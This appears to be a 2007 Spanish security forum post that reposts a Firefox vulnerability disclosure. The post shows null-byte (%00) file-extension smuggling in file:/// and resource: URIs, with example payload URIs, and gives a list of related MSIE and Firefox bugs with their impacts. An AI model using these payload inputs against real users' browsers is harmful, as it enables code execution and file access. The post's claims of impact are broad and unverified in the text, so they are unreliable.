elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
14 Febrero 2012, 11:01  


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  Firefox Remote & Local Code Excution 0day.
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Firefox Remote & Local Code Excution 0day.  (Leído 1,308 veces)
el-brujo
ehn
***
Desconectado Desconectado

Mensajes: 16.990


La libertad no se suplica, se conquista


Ver Perfil WWW
Firefox Remote & Local Code Excution 0day.
« en: 6 Junio 2007, 20:04 »

Pointers that are vulnerable:

Código:
file:///
resource:

Use:
[uri]/[filelocation]/[file][.ext]%00[.ext]

Example:
file:///C:/Program%20Files/Mozilla%20Firefox/firefox.exe%00.html

or:

Código:
resource:///README.txt%00.html

More filetypes:

file:///C:/Program%20Files/Mozilla%20Firefox/firefox.exe%00.html
file:///C:/Program%20Files/Mozilla%20Firefox/firefox.exe%00.js
file:///C:/Program%20Files/Mozilla%20Firefox/firefox.exe%00.pdf
file:///C:/Program%20Files/Mozilla%20Firefox/firefox.exe%00.doc
file:///C:/Program%20Files/Mozilla%20Firefox/firefox.exe%00.xls
probably every filetype.

Oh and: file:///C:/Program%20Files/Mozilla%20Firefox/firefox.exe%00.xpi :)

This could lead to various exploits, to name a few:

- Dossing a user, the above example does it almost.
- Code execution
- File access
- Trojan activation
- Virus activation
- Reflective Cross Site Scripting (RXSS)
- Cross Site Request Forgeries (CSRF)

Fuente:
http://www.0x000000.com/index.php?i=333

Más:

1) Title : MSIE page update race condition (CRITICAL)
Impact : cookie stealing / setting, page hijacking, memory corruption
Affected : MSIE6 and MSIE7

2) Title : Firefox Cross-site IFRAME hijacking (MAJOR)
Impact : keyboard snooping, content spoofing, etc
Affected : Firefox 2.0

3) Title : Firefox file prompt delay bypass (MEDIUM)
Impact : non-consentual download or execution of files
Affected : Firefox v?.?

3) Title : MSIE6 URL bar spoofing (MEDIUM)
Impact : mimicking an arbitrary site, possibly including SSL data
Affected : MSIE6
 
Fuente:
http://lists.grok.org.uk/pipermail/full-disclosure/2007-June/063712.html
En línea

"elhacker.net es único, por eso no fabrica para otras marcas"  - Prohibido prohibir

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
0day DBisam (A2 Softway)
Bugs y Exploits
oPen syLar 1 696 Último mensaje 7 Diciembre 2011, 21:36
por berz3k
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines